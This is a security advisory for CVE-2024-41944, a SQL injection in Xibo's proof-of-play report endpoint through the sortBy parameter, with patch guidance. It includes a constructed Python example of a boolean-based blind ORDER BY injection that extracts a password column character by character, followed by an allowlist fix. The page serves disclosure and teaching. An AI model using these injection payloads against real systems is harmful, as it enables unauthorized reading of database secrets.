PT-2024-29652 · Xibo · Xibo
Sergey Bobrov
·
Published
2024-07-30
·
Updated
2024-08-13
·
CVE-2024-41944
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N |
Name of the Vulnerable Software and Affected Versions
Xibo versions prior to 3.3.12
Xibo versions prior to 4.0.14
Description
A SQL injection issue was discovered in the "report/data/proofofplayReport" API endpoint of the Xibo content management system. The endpoint incorporates the value of the sortBy parameter into its database query without validating it, so an authenticated user holding sufficient privileges (the CVSS vector rates the required privileges as high, PR:H) can inject specially crafted values into sortBy to read and modify arbitrary data in the Xibo database.
Recommendations
For versions prior to 3.3.12, upgrade to version 3.3.12 to resolve the issue.
For versions prior to 4.0.14, upgrade to version 4.0.14 to resolve the issue.
As a temporary workaround, consider restricting access to the "report/data/proofofplayReport" API endpoint until a patch is applied.
If the endpoint must remain reachable, reject or strip the sortBy parameter at the server or reverse proxy rather than merely asking clients to avoid it: an attacker supplies the parameter regardless of whether legitimate clients use it.
Exploit
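To make the bug class concrete, the following is an added, constructed example in Python with SQLite. It is not Xibo's code (Xibo is written in PHP, and the vulnerable query itself is not reproduced on this page) and it is not an exploit for Xibo. It assumes an invented stat table and a generic pattern in which the sortBy value is concatenated into ORDER BY; it shows how that concatenation turns into a boolean oracle that reads other tables one character at a time, and then the allowlist-based replacement that a fixed endpoint should use. All table names, columns and rows are made up for the illustration.

```python
import sqlite3
import string


def make_db():
    """Constructed in-memory stand-in for a proof-of-play statistics table.

    Table names, columns and rows are invented for this example; they are
    not Xibo's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE stat (statId INTEGER PRIMARY KEY, displayId INTEGER,
                           layoutId INTEGER, numberPlays INTEGER);
        INSERT INTO stat VALUES (1, 10, 100, 5), (2, 11, 101, 12), (3, 12, 102, 1);
        CREATE TABLE user (userId INTEGER PRIMARY KEY, userName TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'admin', 'hash-of-admin-password');
        """
    )
    return conn


def vulnerable_report(conn, sort_by):
    """Vulnerable pattern (assumed, generic): the sortBy value is concatenated
    into ORDER BY. Column names cannot be bound as parameters, so code that
    offers a user-selectable sort column often ends up doing exactly this."""
    sql = ("SELECT statId, displayId, layoutId, numberPlays FROM stat "
           "ORDER BY " + sort_by)
    return conn.execute(sql).fetchall()


def blind_oracle(conn, condition):
    """Turn the ORDER BY injection into a yes/no oracle.

    When `condition` is true the rows come back ordered by statId (1, 2, 3);
    when false, by numberPlays (3, 1, 2). Nothing from the user table is
    ever returned to the caller; only the row order leaks."""
    payload = f"(CASE WHEN ({condition}) THEN statId ELSE numberPlays END)"
    rows = vulnerable_report(conn, payload)
    return [r[0] for r in rows] == [1, 2, 3]


def leak_password_prefix(conn, length):
    """Recover the first `length` characters of the admin password column one
    character at a time through the oracle (boolean-based blind SQLi)."""
    alphabet = string.ascii_letters + string.digits + "-"  # no quote chars, keeps the literal safe
    known = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM user "
                    f"WHERE userName = 'admin') = '{ch}'")
            if blind_oracle(conn, cond):
                known += ch
                break
        else:
            break  # next character is outside our alphabet; stop here
    return known


# Hardened form: map the request value onto a fixed set of real column names
# and validate the direction, so nothing user-controlled reaches the SQL text.
SORT_COLUMNS = {
    "statId": "statId",
    "displayId": "displayId",
    "layoutId": "layoutId",
    "numberPlays": "numberPlays",
}


def sort_is_allowed(sort_by, direction="ASC"):
    """True only for a known column key and a literal ASC/DESC direction."""
    return sort_by in SORT_COLUMNS and direction.upper() in ("ASC", "DESC")


def hardened_report(conn, sort_by, direction="ASC"):
    if not sort_is_allowed(sort_by, direction):
        raise ValueError(f"unsupported sort: {sort_by!r} {direction!r}")
    sql = (f"SELECT statId, displayId, layoutId, numberPlays FROM stat "
           f"ORDER BY {SORT_COLUMNS[sort_by]} {direction.upper()}")
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", leak_password_prefix(db, 7))
    try:
        hardened_report(db, "(CASE WHEN 1=1 THEN statId ELSE numberPlays END)")
    except ValueError as exc:
        print("hardened endpoint rejected payload:", exc)
```

Running the module prints the leaked prefix of the invented password column and the rejection raised by the hardened function. The point of the allowlist is that sortBy is never treated as SQL text: the request value selects a key, and only the mapped column name plus a validated ASC/DESC keyword reach the query. Because identifiers cannot be passed as bound parameters, this lookup is the only safe way to accept a caller-chosen sort column.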
Fix
SQL injection
Weakness Enumeration
Related Identifiers
Affected Products
Xibo